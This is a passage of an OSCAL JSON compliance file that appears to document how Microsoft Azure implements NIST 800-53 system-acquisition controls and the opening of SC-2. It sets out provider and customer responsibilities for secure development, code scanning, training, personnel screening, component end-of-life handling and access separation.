statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"415cea3b-5459-483e-82d9-699dd2e6120d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-052"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11_smt.d","by-components":[{"uuid":"e6de0184-a899-4a0d-b6e6-ef294c299862","export":{"provided":[{"uuid":"c29e2629-4e74-4877-bbad-d943a9fbc07d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-052"}],"description":"The Azure system owner is responsible for ensuring that all system development and maintenance activities are performed in accordance with the Microsoft SDL process. A formal review process is implemented to ensure that new or modified source code authored by Microsoft's online services staff is developed in a secure fashion, that no malicious code has been introduced into the system, and that proper coding practices are followed. The reviewers' names, review dates, and review results are documented in Azure DevOps, and maintained for audit purposes. 
A formal security quality assurance process is implemented to test for vulnerabilities to known security exposures and exploits. The process includes the use of automated security testing tools and requires that all vulnerabilities are remediated in accordance with the SDL BugBar. A ticket for each vulnerability is opened in Azure DevOps and tracked to resolution."}],"responsibilities":[{"uuid":"74481829-4bcf-404c-b91a-59cefcb53369","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-052"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to perform testing and evaluation, including implementing a verifiable flaw remediation process.","provided-uuid":"c29e2629-4e74-4877-bbad-d943a9fbc07d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dfeb05ce-b1dd-43d7-9cb1-3e168f26c5b4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-053"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11_smt.e","by-components":[{"uuid":"7c52f23e-c188-49db-8b60-b1a752456aa4","export":{"provided":[{"uuid":"d2762d0d-78d4-4236-ad77-0d578ac16fba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-053"}],"description":"As part of the SDL process, flaws identified during testing are remediated prior to release. The results of the security tests are documented in tickets opened in Azure DevOps. 
Remediation work and successful retesting is documented in the same ticket."}],"responsibilities":[{"uuid":"aac46457-97dd-43ae-8d4f-37e6f7426984","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-053"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to perform testing and evaluation, including the correction of flaws identified during security testing/evaluation.","provided-uuid":"d2762d0d-78d4-4236-ad77-0d578ac16fba"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"62560790-bdd5-443c-bdad-ac65804be171","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-11.1","statements":[{"uuid":"bf09748c-590f-41bd-bfaa-2854901aa010","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-054"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11.1_smt","by-components":[{"uuid":"ec2bb39e-1f15-47f1-a7ff-dc1f97cf316a","export":{"provided":[{"uuid":"8736a9be-36e8-449c-bcbc-4a8a80ab602f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-054"}],"description":"Code reviews are performed as part of the Microsoft Security Development Lifecycle (SDL), including using automated tools. All release builds are run through virus scanning checks and the results are resolved prior to release into production. 
Automated code analysis tools such as BinSkim, Credential Scanner (CredScan), and other tools are run as determined by the SDL requirements. CredScan is utilized on all official builds in all build pipelines, and it either breaks the build process, preventing production use, or creates work items assigned to the Azure service team for remediation. Malware identification is run on all builds in all pipelines, and it breaks the build if issues are found."}],"responsibilities":[{"uuid":"0ce767d7-dde6-4d74-8aa6-c8a3610aa56f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-054"}],"description":"The customer is responsible for requiring the developer of customer-deployed resources to employ static code analysis tools to identify common flaws and document the results of the analysis.","provided-uuid":"8736a9be-36e8-449c-bcbc-4a8a80ab602f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b735f8af-aa91-4f88-a0fa-7d90a8087314","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-11.2","statements":[{"uuid":"fbdb32f9-be8c-42f9-a290-3be18878002f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-055"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11.2_smt","by-components":[{"uuid":"c57a606b-1cbb-4956-b0d8-10eb8509c6e6","export":{"provided":[{"uuid":"1a724892-a606-4f42-b10e-4c46d693ab95","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-055"}],
"description":"In accordance with Microsoft's Security Development Lifecycle (SDL), security testing occurs in several phases throughout the SDL process. Specifically, security testing occurs during the following phases:\n\n* Phase 3 - Implementation\n* Phase 4 - Verification\n* Phase 5 - Release\n\nTesting at the release phase is performed on the as-built system. Vulnerabilities found at the release testing phase are tracked and remediated."}],"responsibilities":[{"uuid":"fca2dc8f-ac97-4f91-af41-0bf246cb12b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-055"}],"description":"The customer is responsible for requiring the developer of customer-deployed resources to perform testing and evaluation, including threat and vulnerability analyses and subsequent testing/evaluation of the as-built resources.","provided-uuid":"1a724892-a606-4f42-b10e-4c46d693ab95"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a25db826-6a1c-4a54-9f16-50227b533765","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-15","statements":[{"uuid":"f40e8c07-5736-45f9-bc0d-b2f5847b1bcf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-056"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-15_smt.a","by-components":[{"uuid":"09a1c95e-df63-449e-aa41-2eaae248962f","export":{"provided":[{"uuid":"b198bfa6-e550-4ca4-9575-c45f9e8c1ff5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-056"}],"description":"All development in Azure must follow the Security Development Lifecycle (SDL) process for all engineering and development projects. The SDL process includes the following: * Addressing security requirements: The Requirements phase of the SDL includes the project inception-when the organization considers security and privacy at a foundational level-and a cost analysis-when determining if development and support costs for improving security and privacy are consistent with business needs. * Identifying standards and tools/documents tools and configurations: The Implementation phase is when the organization creates the documentation and tools the customer uses to make informed decisions about how to deploy the software securely. 
To this end, the Implementation phase is when the organization establishes development best practices to detect and remove security and privacy issues early in the development cycle. Microsoft understands, observes, and implements the security requirements and considerations as outlined in GSA IT Security Procedural Guide 09-48, Security Language for IT Acquisition Efforts for the information system consistent with the Azure offering's requirements. * Documents, manages, and ensures the integrity of changes: During the Verification phase, the organization ensures that the code meets the security and privacy tenets established in the previous phases. This is done through security and privacy testing, and a security push-which is a team-wide focus on threat model updates, code review, testing, and thorough documentation review and edit. A public release privacy review is also completed during the Verification phase."}],"responsibilities":[{"uuid":"ef279309-1d21-4c14-9a9b-32cb9841de2f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-056"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring developers of customer-deployed resources to follow a documented development process that: explicitly addresses security and privacy requirements; identifies standards and tools used; documents the specific tool options and configurations used; documents, manages, and ensures the integrity of changes to the process and/or tools used in development.","provided-uuid":"b198bfa6-e550-4ca4-9575-c45f9e8c1ff5"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"99a0c780-ed75-458a-a92a-bfb821daca41","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-057"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-15_smt.b","by-components":[{"uuid":"aa49ec27-15c1-42b2-835b-264de1bc9954","export":{"provided":[{"uuid":"0187dd62-f647-4c2b-bb0c-d157fbd4c412","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-057"}],"description":"Microsoft reviews the SDL process at least every six months to ensure that the process, standards, and tools selected and employed provide sufficient security and privacy for all services and software developed and released by Microsoft."}],"responsibilities":[{"uuid":"3ac72007-a2f9-4a40-aa2c-1f4efde19668","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-057"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing the development process, standards, tools, and tool options/configurations as needed to determine if they can satisfy security and privacy requirements.","provided-uuid":"0187dd62-f647-4c2b-bb0c-d157fbd4c412"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"012a5d50-27bb-4f8a-9fa0-7d4b5b51df20","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-15.3","statements":[{"uuid":"202cc2ae-6d6d-4db0-8194-259b65c06ba9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-058"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-15.3_smt","by-components":[{"uuid":"a0ba7e16-d0b4-4e94-87ce-26ce1a62377b","export":{"provided":[{"uuid":"480819c3-1d9b-4544-b6bc-ce8f6d1f1c57","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-058"}],"description":"Microsoft reviews the SDL process at least every six (6) months to ensure that the process, standards, and tools selected and employed provide sufficient security for all services developed and released by Microsoft."}],"responsibilities":[{"uuid":"66dbdc98-63b4-470c-92e4-9e83b35ccb22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-058"}],"description":"The customer is responsible for requiring the developer of the information system, system component, or information system service to perform a criticality analysis at an organization-defined breadth/depth and at organization-defined decision points in the system development life cycle.","provided-uuid":"480819c3-1d9b-4544-b6bc-ce8f6d1f1c57"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"06908960-c7b3-4183-b7f2-df874afff685","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-16","statements":[{"uuid":"8ed8dfc7-0410-4c63-b228-5230e6c05876","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-059"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-16_smt","by-components":[{"uuid":"9d3e3e58-71a3-4350-ba8a-422125021219","export":{"provided":[{"uuid":"23932255-7020-47f0-af1c-fd17cb3e3e51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-059"}],"description":"All members of software development teams receive appropriate training to stay informed about security basics and recent trends in security. Individuals who develop software programs are required to complete at least one security training course in person or online each year. Security training can help ensure software is created with security in mind and can also help development teams stay current on security issues. Project team members are strongly encouraged to seek additional security and privacy education that is appropriate to their needs or products. Azure service teams maintain, secure, manage, and store information system documentation, including documentation regarding: * Secure configuration, installation, and operation of the information system; * Effective use and maintenance of security features/functions; and * Known vulnerabilities regarding configuration and use of administrative (i.e. 
elevated) functions. This documentation is stored in each service team's SharePoint site through Azure Security and is made available to service team members. Review of relevant documentation is part of initial and ongoing training activities held at least annually."}],"responsibilities":[{"uuid":"b5c01163-7a93-4f9a-bcae-1f68153170c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-059"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to provide customer-defined training on the correct use and operation of the implemented security functions, controls, and/or mechanisms for the resources provided.","provided-uuid":"23932255-7020-47f0-af1c-fd17cb3e3e51"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"66db9b0d-843e-4f5a-99ae-4e7b3c1af8af","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-17","statements":[{"uuid":"1ab19011-906a-4c0a-b06a-c6df8afbc2c5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-060"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-17_smt.a","by-components":[{"uuid":"7d33d081-4e03-4535-a7d4-c41e65dc3049","export":{"provided":[{"uuid":"28964048-d3b6-4625-9463-d9ef142d50ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-060"}],"description":"Microsoft's software development practices include evaluating the design, security and 
privacy architecture of new services and components in the environment. The C+AI Security Assurance team works with the component/feature teams to provide guidance during the implementation of Security Development Lifecycle (SDL) activities in software development projects including identifying requirements for deep review such as threat modeling, and penetration testing."}],"responsibilities":[{"uuid":"f1159628-caff-4df5-9f67-3c9f4b25f743","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-060"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to produce a design specification and security and privacy architecture that is consistent with and supportive of the customer's enterprise architecture.","provided-uuid":"28964048-d3b6-4625-9463-d9ef142d50ae"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4d1074e1-6679-4c64-b609-f93cc317494a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-061"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-17_smt.b","by-components":[{"uuid":"95704044-4fba-4ea0-8fc4-95a7bde1c978","export":{"provided":[{"uuid":"068c4190-3f29-466f-bb77-939d767a19e7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-061"}],"description":"The security and privacy architecture produced during the Design phase of the SDL process defines all attack surfaces, their associated risks, and security and privacy functionality necessary to address those 
risks."}],"responsibilities":[{"uuid":"fb7b390f-d268-47d3-8da9-9aafe3bf6b7a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-061"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to produce a design specification and security and privacy architecture that accurately and completely describes the required security functionality, and the allocation of security and privacy controls among logical resources.","provided-uuid":"068c4190-3f29-466f-bb77-939d767a19e7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6874f388-2832-4358-b427-84ea04a38054","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-062"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-17_smt.c","by-components":[{"uuid":"f38ea3d2-f6cf-4c7d-a76a-b248948b22a8","export":{"provided":[{"uuid":"f361366d-c81b-4a7b-a2a1-4da02ed7a3d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-062"}],"description":"The security and privacy architecture produced during the Design phase of the SDL process demonstrates how individual security and privacy functions reinforce each other to provide a complete and unified approach to protection."}],"responsibilities":[{"uuid":"58b2ac97-0e0a-4dd0-b5bb-682011f5e589","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-062"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to produce a design 
specification and security and privacy architecture that expresses how individual security and privacy functions, mechanisms, and services work together to provide required security and privacy capabilities and a unified approach to protection.","provided-uuid":"f361366d-c81b-4a7b-a2a1-4da02ed7a3d2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"90cfdf04-743c-4bf7-b534-865bec5b0f08","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-21","statements":[{"uuid":"45a990e5-784f-4643-9ecd-c4359c762b47","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-063"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-21_smt.a","by-components":[{"uuid":"e82c3d03-fc7c-48c7-8b79-a22d5a2a3a44","export":{"provided":[{"uuid":"a8064cb8-0c89-4bdd-ad75-9bfe5ab0c3c1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-063"}],"description":"The Microsoft Security department conducts background checks and enforces the screening policies for all personnel. Background checks in the form of the Microsoft Cloud Screen are required for new hires or personnel transferring to positions that involve access to customers' work sites and/or sensitive areas, including access to customer PII. 
The Microsoft Cloud Screen includes the following: * Employment history check for the previous five years * Education Check (highest degree obtained) * Social Security Number (SSN) Check * Criminal History Check for the previous seven years * Office of Foreign Assets Control List (OFAC) Check * Bureau of Industry and Security List (BIS) Check * Office of Defense Trade Controls Debarred Persons List Check Vendor staff with access to customer data are required to sign a background screening addendum with Microsoft or provide the results of the background screening from the third-party provider. Microsoft managers are required to include screening verbiage in their respective SOWs with vendors."}],"responsibilities":[{"uuid":"e74d5ddd-6d1b-4477-bb1e-079288e7b051","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-063"}],"description":"The customer is responsible for having appropriate access authorizations as determined by assigned organization-defined official government duties.","provided-uuid":"a8064cb8-0c89-4bdd-ad75-9bfe5ab0c3c1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"aa2dc9b2-04d8-4aad-80fd-bfe574187d12","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-064"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-21_smt.b","by-components":[{"uuid":"24d248a6-9943-421b-805a-e1776876e9bb","export":{"provided":[{"uuid":"2795927d-1475-4b15-86f9-c28ba048a7a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-064"}],"description":"The 
Microsoft Security department conducts background checks and enforces the screening policies for all personnel. Background checks in the form of the Microsoft Cloud Screen are required for new hires or personnel transferring to positions that involve access to customers' work sites and/or sensitive areas, including access to customer PII. The Microsoft Cloud Screen includes the following: * Employment history check for the previous five years * Education Check (highest degree obtained) * Social Security Number (SSN) Check * Criminal History Check for the previous seven years * Office of Foreign Assets Control List (OFAC) Check * Bureau of Industry and Security List (BIS) Check * Office of Defense Trade Controls Debarred Persons List Check Vendor staff with access to customer data are required to sign a background screening addendum with Microsoft or provide the results of the background screening from the third-party provider. Microsoft managers are required to include screening verbiage in their respective SOWs with vendors."}],"responsibilities":[{"uuid":"5df0c70d-c6f0-4c73-b1c7-841db4504258","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-064"}],"description":"The customer is responsible for satisfying organization-defined additional personnel screening criteria.","provided-uuid":"2795927d-1475-4b15-86f9-c28ba048a7a7"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"fca0272d-bde2-4ac1-be02-7b9899974778","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-22","statements":[{"uuid":"6165d172-4a1b-4996-9128-109106e47cf2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-065"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-22_smt.a","by-components":[{"uuid":"266ff496-fc99-41df-a7c9-77cc3a1c53e2","export":{"provided":[{"uuid":"a65cb6bd-f9b9-4009-8641-ed2f8a526d0d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-065"}],"description":"Azure does not rely on components that are end of life or no longer supported. Azure tracks software and hardware end-of-life and end-of-support and establishes decommissioning plans as necessary. Azure tracks decommissioning of servers and network devices using dashboards and maintenance tickets. 
If necessary, Azure utilizes extended support from external vendors where available."}],"responsibilities":[{"uuid":"713f7301-cb9f-4fe0-8dbb-3791c6bb4057","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-065"}],"description":"The customer is responsible for replacing information system components when support for the components is no longer available from the developer, vendor, or manufacturer.","provided-uuid":"a65cb6bd-f9b9-4009-8641-ed2f8a526d0d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"13d560e8-8c10-414e-b678-c78bbc8f85d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-066"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-22_smt.b","by-components":[{"uuid":"ba396f4a-8a71-4ab6-9405-2533d61539c4","export":{"provided":[{"uuid":"0176f4ad-4085-451b-bba7-6e19d4acb228","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-066"}],"description":"Azure does not rely on components that are end of life or no longer supported. Azure tracks software and hardware end-of-life and end-of-support and establishes decommissioning plans as necessary. Azure tracks decommissioning of servers and network devices using dashboards and maintenance tickets. 
If necessary, Azure utilizes extended support from external vendors where available."}],"responsibilities":[{"uuid":"fcde4162-db4b-41b8-8fa6-8ce52ad8cb4e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-066"}],"description":"The customer is responsible for providing options for alternative resources for the continued use of unsupported system components.","provided-uuid":"0176f4ad-4085-451b-bba7-6e19d4acb228"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"229f3c99-31ae-4812-bc6f-e89ba47a4187","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-2","statements":[{"uuid":"c5de97af-6c9a-4ab6-bcce-c4b9ef424983","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-2_smt","by-components":[{"uuid":"01920d64-e6f0-41cc-9048-a02aec541204","export":{"provided":[{"uuid":"ff004786-471c-46e3-9a04-bf74ef4fc526","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-006"}],"description":"Azure separates functionality into standard access and elevated access, corresponding to user and management functionality. This ensures logical separation of functionality. All personnel with standard access are granted system metadata read access used for regular troubleshooting, release management, and other maintenance and monitoring activities. 
Standard access provides permissions to key Azure tools, services, SharePoint sites, documentation, and a variety of dashboards. All personnel must use JIT when elevated access is required in the Azure production environment. Unless there is an approved exception as described below, there is no standing or persistent elevated access to the Azure production environment. The primary exception is emergency elevated access. In other instances of persistent elevated access, where the only access supported is elevated access, access is identified as an exception and approved. This occurs with local accounts on assets, some of which cannot be disabled. Azure separates internal traffic from external traffic to achieve greater logical separation as well. Internal traffic uses private address space that is not externally routable. The translation between internal address space and external space is performed at the Azure Load Balancers. Virtual IPs (VIPs) that are externally routable are translated into internal Dynamic IPs (DIPs) that are only routable within Azure. 
